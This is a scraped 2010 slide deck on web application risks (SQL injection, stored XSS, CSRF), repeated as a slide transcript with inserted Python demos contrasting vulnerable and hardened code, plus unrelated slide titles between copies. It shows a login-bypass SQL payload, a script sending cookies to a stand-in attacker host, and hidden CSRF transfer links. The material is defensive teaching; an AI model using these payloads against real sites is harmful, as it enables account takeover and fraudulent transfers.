is the web @ risk ?
World Internet Project Meeting 2010

Carlos Serrão
ISCTE-IUL / SoTA / ADETTI-IUL
Instituto Superior de Ciências do Trabalho e da Empresa, Instituto Universitário de Lisboa
School of Technology and Architecture, ADETTI-IUL
carlos.serrao@iscte.pt
carlos.j.serrao@gmail.com
http://www.carlosserrao.net
http://blog.carlosserrao.net
http://www.linkedin.com/in/carlosserrao
Is the Web …
           … at risk?
           … a risk?
           … putting YOU at risk?


WHY?          HOW?
        WHEN?
The Internet…
          … and the WWW,
          in the beginning...

          Vinton Gray Cerf and Robert Elliot Kahn
          … a.k.a. the “Internet fathers”
The Internet was created…
          … as a ubiquitous
          … decentralized
          … standardized
          … global
          … interconnected
          … digital
… communications channel.
in the beginning...




            Sir Tim Berners-Lee


          … a.k.a. the “WWW father”
The WWW was created!

A system of
interlinked
hypertext documents
accessed via the
Internet.

Infinite worldwide
knowledge access.
growth
evolving, growing
network

   [three stages of the network, earlier to later, as seen from the user]

   stage 1                    stage 2                        stage 3
   -------------------------  -----------------------------  ----------------------------
   Small part of the data on  Large amounts of data on a     Data on the Cloud
   a specific web-site (or a  large number of sites
   limited number of sites)
   Applications on the        Applications on the desktop    Applications on the Web
   desktop                    and Web (more and more)        and Cloud
   Most data is on the        Part of the data still on the  Data almost nonexistent on
   desktop                    desktop (but also mobile)      the desktop (still on mobile)
   Data processing on the     Data processing on the         Data processing on the
   desktop                    desktop, but also on the web   desktop almost nonexistent
security++
    what do we have today?
       anti-virus
       anti-malware
       anti-spyware
       firewalls
       intrusion detection systems
       …
       are they enough?
security++
    YES, but…
       do they protect the user from the web applications?
       can a Web application be compromised to hurt legitimate users?
       sure it can.
security++
    How?
       Do you trust your favorite web applications?
         Google
         Gmail
       Do you trust your favorite social web applications?
         Facebook
         Twitter
       Do you trust your homebanking?
       Do you trust your government web sites?
security++
    The security perimeter has huge security holes in the application layer.
    [diagram: an APPLICATION ATTACK passes straight through the network layer
     (firewall, hardened OS, firewall) and reaches the application layer:
     web server, app server and custom developed application code, with
     legacy systems, databases, web services, directories, human resources
     and billing systems behind them]
implications…

security trends
   [chart: problem types – typical problems on web apps]

the security risks
   http://www.owasp.org/index.php/Top_10
security risks
    considering three of the most important (OWASP Top 10 2010 numbering)
       A1: Injection
       A2: Cross Site Scripting (XSS)
       A5: Cross Site Request Forgery (CSRF)
A1: Injection
                what if?

  SELECT * FROM users usr
  WHERE usr.username = 'admin';--'
  AND usr.password='bb21158c733229347bd4e681891e213d94c685be'

  (the submitted username admin';-- closes the string literal and turns the
   rest of the line, including the password check, into a SQL comment: the
   query now returns the admin row for any password)

any input from the web app user can be an attack vector
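As an added example (not from the slides), the query above is rebuilt against an in-memory SQLite database, first the way the slide builds it, by gluing the user's input into the SQL text, and then with bound parameters. The users table, the demo password and the use of SHA-1 for the stored digest are assumptions made only to mirror the 40-hex-character hash on the slide; an unsalted fast hash is not an acceptable password store.

```python
import hashlib
import sqlite3

# Constructed demo password. The slide compares against a 40-hex-character
# digest, which is what SHA-1 produces, so the demo hashes the same way.
# This mirrors the slide only; it is not a recommended password store.
DEMO_PASSWORD = "correct horse battery staple"

# The injected username from the slide: the quote closes the string literal
# and "--" turns the rest of the line (the password check) into a comment.
INJECTED_USERNAME = "admin';--"


def sha1_hex(text: str) -> str:
    return hashlib.sha1(text.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory users table with a single 'admin' row (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", sha1_hex(DEMO_PASSWORD)))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The slide's pattern: user input is concatenated into the SQL text,
    so the input can change the structure of the query."""
    query = (
        "SELECT * FROM users usr "
        "WHERE usr.username = '" + username + "' "
        "AND usr.password = '" + sha1_hex(password) + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with bound parameters: the engine receives the input as
    data, so a quote or comment marker in it is just characters to match."""
    row = conn.execute(
        "SELECT * FROM users usr WHERE usr.username = ? AND usr.password = ?",
        (username, sha1_hex(password)),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected username:   ", login_vulnerable(db, INJECTED_USERNAME, "x"))
    print("parameterized, injected username:", login_parameterized(db, INJECTED_USERNAME, "x"))
    print("parameterized, real password:    ", login_parameterized(db, "admin", DEMO_PASSWORD))
```

Run it and the injected username logs in as admin without knowing the password, but only through the first function. Parameter binding is the fix because the input never reaches the SQL parser; the same rule applies to every other input the slide warns about (cookies, headers, hidden fields), not only visible form fields.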
A2: Cross Site Scripting (XSS)
     injecting a malicious payload into the web application from the
     client side so that it is delivered to, and executed by, other users
     (the victims)
A2: Cross Site Scripting (XSS)
    [diagram: the application with a stored XSS vulnerability, its business
     functions (Administration, Transactions, Accounts, Finance, Knowledge Mgmt,
     Communication, Bus. Functions, E-Commerce) and the Custom Code behind them]

    1  Attacker sets the trap – “update my profile”: the attacker enters a
       malicious script into a web page that stores the data on the server
    2  Victim views the page – sees the attacker's profile: the script runs
       inside the victim's browser with full access to the DOM and cookies
    3  The script silently sends the victim's session cookie to the attacker
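The three steps above on the server side, as an added example that is not part of the deck. The page template, the attacker's profile text and the attacker.invalid hostname are constructed for the demo. The stored profile is rendered twice, once the way a vulnerable application does it and once with output encoding, and the session cookie is issued with the HttpOnly flag, which keeps step 3 from working even when step 2 succeeds.

```python
import html

# Constructed attacker profile text of the kind step 1 describes: a script that
# ships document.cookie to an attacker-controlled host (hypothetical hostname).
ATTACKER_PROFILE = (
    "<script>new Image().src='http://attacker.invalid/c?'"
    "+encodeURIComponent(document.cookie)</script>"
)

# Constructed page template; {about} is where the stored profile text goes.
PAGE_TEMPLATE = '<html><body><h1>Profile</h1><div class="about">{about}</div></body></html>'


def render_profile_vulnerable(about: str) -> str:
    """Stored XSS: the stored text is pasted into the HTML unchanged, so a
    <script> tag in it runs in every viewer's browser (step 2 of the slide)."""
    return PAGE_TEMPLATE.format(about=about)


def render_profile_safe(about: str) -> str:
    """Output encoding for an HTML element body: <, >, &, and quotes become
    entities, so the browser displays the text instead of executing it."""
    return PAGE_TEMPLATE.format(about=html.escape(about, quote=True))


def session_cookie_header(value: str) -> str:
    """Defence in depth for step 3: an HttpOnly cookie is not exposed to
    document.cookie, so an injected script cannot read it. Secure limits it
    to HTTPS; SameSite=Lax stops most cross-site requests from carrying it."""
    return f"Set-Cookie: SESSIONID={value}; HttpOnly; Secure; SameSite=Lax; Path=/"


def contains_live_script(page: str) -> bool:
    """True when the rendered page still contains an executable <script> tag."""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print("vulnerable page executes script:", contains_live_script(render_profile_vulnerable(ATTACKER_PROFILE)))
    print("encoded page executes script:   ", contains_live_script(render_profile_safe(ATTACKER_PROFILE)))
    print(session_cookie_header("constructed-session-id"))
```

html.escape is the right encoding for HTML element bodies and quoted attribute values only; text placed inside a JavaScript block, a URL or a CSS context needs the encoding for that context, and a Content-Security-Policy header adds a second layer if the encoding is missed somewhere.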
A5: Cross Site Request Forgery (CSRF)

     an attacker can build his own malicious website (or e-mail) and make the
     user's browser issue requests to a site where the user is logged in
A5: Cross Site Request Forgery (CSRF)
    [diagram: the application with a CSRF vulnerability, the same business
     functions and Custom Code as in the XSS diagram]

    1  Attacker sets the trap on some website on the internet (or simply via
       an e-mail): a hidden <img> tag contains the attack against the
       vulnerable site
    2  While logged into the vulnerable site, the victim views the attacker's
       site: the <img> tag is loaded by the browser, which sends a GET request
       (including credentials) to the vulnerable site
    3  The vulnerable site sees a legitimate request from the victim and
       performs the action requested
A5: Cross Site Request Forgery (CSRF)

    Alice wants to transfer 100€ to Bob through bank.com:

        POST http://bank.com/transfer.do HTTP/1.1
        ...
        Content-Length: 19

        acct=BOB&amount=100

    Pirate  realizes that the same bank.com web application can execute
            the transfer using a URL with parameters:
            GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1

            will try to use Alice to transfer 100.000€ to his own account:
            http://bank.com/transfer.do?acct=MARIA&amount=100000

            sends an HTML e-mail to Alice with a URL to click:
            <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>

            or sends an HTML e-mail to Alice with an image that hides the attack:
            <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">

    Alice   if Alice is authenticated at bank.com with an active session, the
            transfer is performed: her browser attaches the session cookie to
            the request automatically, so bank.com cannot tell it from a
            request Alice meant to send
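A toy bank.com transfer.do, as an added example that is not the slides' code: first as the slide describes it, then hardened. The account names and amounts come from the slide; the cookie value, the session table and the token scheme (an HMAC of the session cookie under a server-side key, one common form of synchronizer token) are assumptions for the demo. It goes one step beyond the slide: the hardened endpoint also rejects a POST without the token, because moving the action to POST alone does not help, since an attacker page can auto-submit a hidden form.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Server-side key for minting anti-CSRF tokens (constructed, per process).
CSRF_KEY = secrets.token_bytes(32)

# The attacker's hidden image from the slide; the browser turns it into a GET.
IMG_SRC = "http://bank.com/transfer.do?acct=MARIA&amount=100000"
ALICE_COOKIE = "alice-session-cookie"   # constructed session cookie value


def csrf_token_for(session_cookie: str) -> str:
    """Token bound to the session. The attacker's page cannot read Alice's
    cookie (same-origin policy), so it can neither compute nor fetch this."""
    return hmac.new(CSRF_KEY, session_cookie.encode(), hashlib.sha256).hexdigest()


class Bank:
    """Toy bank.com with a transfer.do endpoint (constructed accounts)."""

    def __init__(self) -> None:
        self.balances = {"ALICE": 200_000, "BOB": 0, "MARIA": 0}
        self.sessions = {ALICE_COOKIE: "ALICE"}   # cookie value -> account

    def _transfer(self, src: str, dst: str, amount: int) -> int:
        if dst not in self.balances or amount <= 0 or self.balances[src] < amount:
            return 400
        self.balances[src] -= amount
        self.balances[dst] += amount
        return 200

    def transfer_vulnerable(self, method: str, url: str, cookie: str) -> int:
        """As on the slide: any method, parameters read from the URL, and the
        only check is the session cookie, which the browser sends by itself."""
        user = self.sessions.get(cookie)
        if user is None:
            return 401
        q = parse_qs(urlsplit(url).query)
        return self._transfer(user, q["acct"][0], int(q["amount"][0]))

    def transfer_hardened(self, method: str, url: str, cookie: str, form: dict) -> int:
        """Requires POST plus a synchronizer token in the body that matches the
        session. An <img> or <a> can send neither; an auto-submitted form on
        the attacker's site can send a POST but cannot know the token."""
        user = self.sessions.get(cookie)
        if user is None:
            return 401
        if method != "POST":
            return 405
        token = form.get("csrf_token", "")
        if not hmac.compare_digest(token, csrf_token_for(cookie)):
            return 403
        return self._transfer(user, form["acct"], int(form["amount"]))


def victim_loads_image(bank: Bank, handler: str) -> int:
    """Steps 2-3 of the slide: Alice's browser fetches the <img> while logged in."""
    if handler == "vulnerable":
        return bank.transfer_vulnerable("GET", IMG_SRC, ALICE_COOKIE)
    return bank.transfer_hardened("GET", IMG_SRC, ALICE_COOKIE, form={})


if __name__ == "__main__":
    b = Bank()
    print(victim_loads_image(b, "vulnerable"), b.balances)   # 200, MARIA now holds 100000
    b = Bank()
    print(victim_loads_image(b, "hardened"), b.balances)     # 405, balances unchanged
    # Alice's own transfer still works with the token her bank page carries.
    legit = {"acct": "BOB", "amount": "100", "csrf_token": csrf_token_for(ALICE_COOKIE)}
    print(b.transfer_hardened("POST", "http://bank.com/transfer.do", ALICE_COOKIE, legit), b.balances)
```

The token must be checked with a constant-time comparison and tied to the session, and it must never be placed in a URL, where it leaks through Referer headers and logs. Modern browsers add the SameSite cookie attribute as a second layer, but the server-side token remains the control the application owns.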
consequences
               This is serious!!!
               And we are just looking at the tip of the iceberg!
[quick] conclusions
   Take extra care with the web applications you trust your data to
   Take extra care in the way you handle your e-mail
   Always be suspicious of anything “strange” on the web
   Web application developers: take care in what you do – your code is part
   of the security perimeter
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 

Is the Web at Risk?

  • 1. is the web @ risk ? World Internet Project Meeting 2010 ISCTE-IUL/SoTA/ADETTI-IUL Carlos Serrão Instituto Superior de Ciências do Trabalho e da Empresa carlos.serrao@iscte.pt Instituto Universitário de Lisboa carlos.j.serrao@gmail.com School of Technology and Architecture ADETTI-IUL http://www.carlosserrao.net http://blog.carlosserrao.net http://www.linkedin.com/in/carlosserrao
  • 2. Is the Web … … at risk? … a risk? … putting YOU at risk? WHY? HOW? WHEN?
  • 3. The Internet… … and the WWW, in the beginning.
  • 4. in the beginning... Vinton Gray Cerf Robert Elliot Kahn … a.k.a. the “Internet fathers”
  • 5. The Internet was created… … as an ubiquitous … decentralized … standardized … global … interconnected … digital … communications channel.
  • 6. in the beginning... (Sir) Tim Berners-Lee … a.k.a. the “WWW father”
  • 7. The WWW was created! A system of interlinked hypertext documents accessed via the Internet. Infinite worldwide knowledge access.
  • 9–11. evolving, growing network (three stages, left to right on the slide; the column headings did not survive extraction)
       Stage 1: a small part of the data on a specific web-site (or a limited number of web-sites); applications on the desktop; most data is on the desktop; data processing on the desktop.
       Stage 2: large amounts of data on a large number of sites; applications on the desktop and Web (more and more); part of the data still on the desktop (but also mobile); data processing on the desktop, but also on the web.
       Stage 3: data on the Cloud; applications on the Web and Cloud; data almost inexistent on the desktop (still on mobile); data processing almost inexistent on the user side.
  • 12. security++ what do we have today? anti-virus, anti-malware, anti-spyware, firewalls, intrusion detection systems, … are they enough?
  • 13. security++ YES, but… do they protect the user from the web applications? can a Web application be compromised to hurt legitimate users? sure it can.
  • 14. security++ How? Do you trust your favorite web-applications? Google, Gmail. Do you trust your favorite social-web applications? Facebook, Twitter. Do you trust your homebanking? Do you trust your government web-sites?
  • 15. security++ The security perimeter has huge security holes in the application layer. [Diagram: a Network Layer (Firewall, Hardened OS, Web Server, App Server, Firewall) below an Application Layer of Custom Developed Application Code connecting Legacy Systems, Web Services, Databases, Directories, Human Resources and Billing; an APPLICATION ATTACK arrow is aimed at the application layer.]
  • 17. security trends problem types typical problems on web apps
  • 18. the security risks http://www.owasp.org/index.php/Top_10
  • 19. security risks   considering the three most important   A1: Injection   A2: Cross Site Scripting (XSS)   A5: Cross Site Request Forgery (CSRF)
  • 20. A1: Injection what if?
  • 21. A1: Injection what if? SELECT * FROM users usr WHERE usr.username = 'admin';--' AND usr.password='bb21158c733229347bd4e681891e213d94c685be'
  • 22. A1: Injection what if?
  • 23. any input from the web app user can be an attack vector
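The slide-21 query, worked through as an added example (not code from the original slides) in Python against an in-memory SQLite table: the string-built login accepts the username admin';-- with any password, because the quote closes the literal, the semicolon ends the statement and the -- comments out the password check; the parameterised form compares the same text as a plain value and rejects it. The users table, the account password and the function names are constructed for this illustration; the SHA-1 digest only mirrors the 40-hex-digit hash on the slide and is not a recommended password store.

```python
"""A1 Injection: the admin';-- payload against a string-built query and
against a parameterised query (added example, constructed data)."""
import hashlib
import sqlite3

# Constructed sample account; the password is arbitrary demo data.
DEMO_USER = "admin"
DEMO_PASSWORD = "correct horse battery staple"


def build_db() -> sqlite3.Connection:
    """In-memory users table with one account, mirroring the slide's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    digest = hashlib.sha1(DEMO_PASSWORD.encode()).hexdigest()  # 40 hex digits, as on slide 21
    conn.execute("INSERT INTO users VALUES (?, ?)", (DEMO_USER, digest))
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password_digest: str) -> str:
    """Slide-21 style: the SQL text is assembled by string concatenation,
    so the username can rewrite the statement."""
    return (
        "SELECT * FROM users usr WHERE usr.username = '%s' "
        "AND usr.password = '%s'" % (username, password_digest)
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Runs the concatenated query. With username admin';-- the statement
    becomes ... username = 'admin'; and the trailing --' AND ... is a comment,
    so the password is never checked."""
    digest = hashlib.sha1(password.encode()).hexdigest()
    return conn.execute(build_vulnerable_query(username, digest)).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the driver sends the username as a bound value,
    so admin';-- is compared literally against the column and matches nothing."""
    digest = hashlib.sha1(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT * FROM users usr WHERE usr.username = ? AND usr.password = ?",
        (username, digest),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    payload = "admin';--"
    print("vulnerable:", login_vulnerable(build_db(), payload, "anything"))  # True
    print("safe:      ", login_safe(build_db(), payload, "anything"))        # False
```

Binding parameters is the fix for the query text; it does not make the rest of the code safe, so the same discipline applies to table or column names built from input (which cannot be bound and need an allow-list) and to the hashing scheme itself.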
  • 24. A2: Cross Site Scripting (XSS) injecting a malicious payload into the web app from the end-user side so that it is delivered to other users (the victims)
  • 25. A2: Cross Site Scripting (XSS) [diagram: application with a stored XSS vulnerability]
       1. Attacker sets the trap (“update my profile”): the attacker enters a malicious script into a web page that stores the data on the server.
       2. Victim views the page and sees the attacker’s profile: the script runs inside the victim’s browser with full access to the DOM and cookies.
       3. The script silently sends the attacker the victim’s session cookie.
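The three steps of the slide, as an added example (not code from the original slides) in Python: a profile store that keeps whatever the attacker submitted, a page renderer that concatenates it into the HTML, and the hardened renderer that escapes every untrusted value at output time. The profile text, the page template, the attacker host and the function names are constructed for this illustration.

```python
"""A2 Stored XSS: attacker profile text rendered raw versus HTML-escaped
(added example, constructed data)."""
import html
import re

# Constructed attacker input for step 1: the "about me" field carries a script
# that sends document.cookie to a host the attacker controls (hypothetical name).
ATTACKER_PROFILE = (
    'hi! <script>new Image().src="http://attacker.example/c?"+document.cookie</script>'
)

# Constructed server-side store: username -> profile text.
PROFILES: dict[str, str] = {}


def update_profile(user: str, about_me: str) -> None:
    """Step 1: the server stores the submitted text unchanged. Storing it is
    not the bug; it becomes one when the text is later written into HTML raw."""
    PROFILES[user] = about_me


def render_profile_vulnerable(user: str) -> str:
    """Step 2, vulnerable: stored text is concatenated straight into the page
    every viewer receives, so the attacker's script element is real markup."""
    return "<h1>%s</h1><p>%s</p>" % (user, PROFILES[user])


def render_profile_safe(user: str) -> str:
    """Hardened: each untrusted value is escaped for the HTML-body context it is
    inserted into. Attribute, URL and JavaScript contexts need their own encoders;
    html.escape alone is not enough there."""
    return "<h1>%s</h1><p>%s</p>" % (html.escape(user), html.escape(PROFILES[user]))


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def page_runs_script(page: str) -> bool:
    """Stand-in for the victim's browser in step 3: does the page contain a
    script element that would execute? (&lt;script&gt; is text, not an element.)"""
    return SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    update_profile("mallory", ATTACKER_PROFILE)
    print("vulnerable page executes script:", page_runs_script(render_profile_vulnerable("mallory")))
    print("escaped page executes script:   ", page_runs_script(render_profile_safe("mallory")))
```

Output encoding stops the script from running; marking the session cookie HttpOnly is the independent second line of defence for step 3, since a script that does run still cannot read such a cookie through document.cookie.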
  • 26. A5: Cross Site Request Forgery (CSRF) an attacker can build their own malicious website and initiate requests from the user’s browser
  • 27. A5: Cross Site Request Forgery (CSRF) [diagram: application with a CSRF vulnerability]
       1. Attacker sets the trap on some website on the Internet (or simply via an e-mail): a hidden <img> tag contains the attack against the vulnerable site.
       2. While logged into the vulnerable site, the victim views the attacker’s site: the <img> tag is loaded by the browser, which sends a GET request (including credentials) to the vulnerable site.
       3. The vulnerable site sees a legitimate request from the victim and performs the action requested.
  • 28. A5: Cross Site Request Forgery (CSRF)
       Alice transfers 100€ to Bob through bank.com:
         POST http://bank.com/transfer.do HTTP/1.1
         ...
         Content-Length: 19;
         acct=BOB&amount=100
       Pirate realizes that the same bank.com web application can execute the transfer using a URL with parameters:
         GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1
       Pirate will try to use Alice to transfer 100.000€ to his own account:
         http://bank.com/transfer.do?acct=MARIA&amount=100000
       Pirate sends an HTML email to Alice with a URL to click:
         <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>
       or sends an HTML email to Alice with an image that hides the attack:
         <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">
       Alice: if Alice is authenticated at bank.com with an active session, the transfer is performed.
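The bank.com exchange of slides 27 and 28, as an added example (not code from the original slides) in Python: a transfer handler that accepts any authenticated request, the forged GET that Alice's browser emits when the 1x1 <img> loads (cookie attached automatically, as in step 2 of slide 27), and a hardened handler that performs the transfer only on a POST carrying a synchronizer token bound to the session, which the attacker's page cannot read. The session table, the balances, the cookie name and the function names are constructed for this illustration.

```python
"""A5 CSRF: bank.com transfer.do with and without a synchronizer token
(added example, constructed data)."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed server state: session cookie -> user and per-session CSRF token.
SESSIONS = {"s3ss10n-alice": {"user": "alice", "csrf": secrets.token_hex(16)}}
# Constructed balances; account names follow the slide (BOB, MARIA).
BALANCES = {"alice": 200_000, "BOB": 0, "MARIA": 0}


@dataclass
class Request:
    method: str
    url: str
    cookies: dict = field(default_factory=dict)  # the browser attaches these on its own
    form: dict = field(default_factory=dict)     # POST body fields


def _session(req: Request):
    return SESSIONS.get(req.cookies.get("SESSIONID"))


def _do_transfer(src: str, dst: str, amount: int) -> str:
    if dst not in BALANCES or BALANCES[src] < amount:
        return "400 rejected"
    BALANCES[src] -= amount
    BALANCES[dst] += amount
    return "200 transferred %d to %s" % (amount, dst)


def transfer_vulnerable(req: Request) -> str:
    """Slide 28: the cookie is the only proof, and GET query parameters are
    honoured, so any request the browser can be tricked into sending succeeds."""
    sess = _session(req)
    if sess is None:
        return "401 not logged in"
    params = {k: v[0] for k, v in parse_qs(urlsplit(req.url).query).items()}
    params.update(req.form)
    return _do_transfer(sess["user"], params["acct"], int(params["amount"]))


def transfer_safe(req: Request) -> str:
    """Hardened: state changes only on POST, and only when the hidden form
    field carries this session's token. A cross-site <img> or <a> can make the
    browser send the cookie, but it cannot read the token to include it."""
    sess = _session(req)
    if sess is None:
        return "401 not logged in"
    if req.method != "POST":
        return "405 use POST"
    if not hmac.compare_digest(req.form.get("csrf_token", ""), sess["csrf"]):
        return "403 missing or wrong CSRF token"
    return _do_transfer(sess["user"], req.form["acct"], int(req.form["amount"]))


def forged_img_request() -> Request:
    """What Alice's browser emits when Pirate's 1x1 <img> loads: a GET to
    bank.com with Alice's cookie and nothing the attacker could not guess."""
    return Request(
        "GET",
        "http://bank.com/transfer.do?acct=MARIA&amount=100000",
        cookies={"SESSIONID": "s3ss10n-alice"},
    )


if __name__ == "__main__":
    print("hardened handler:  ", transfer_safe(forged_img_request()))
    print("vulnerable handler:", transfer_vulnerable(forged_img_request()))
    print("balances:", BALANCES)
```

Refusing GET for state changes on its own is not enough, since the attacker can host an auto-submitting form that POSTs cross-site; the token is what the forged request cannot supply. A SameSite cookie attribute on the session cookie and an Origin header check are the usual complementary layers.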
  • 29. consequences This is serious!!! And we are just looking at the tip of the iceberg!
  • 30. [quick] conclusions: Extra care with the web applications you trust with your data. Extra care in the way you handle your email. Always be suspicious of something “strange” on the web. WebApp developers, take care of what you do: your code is part of the security perimeter.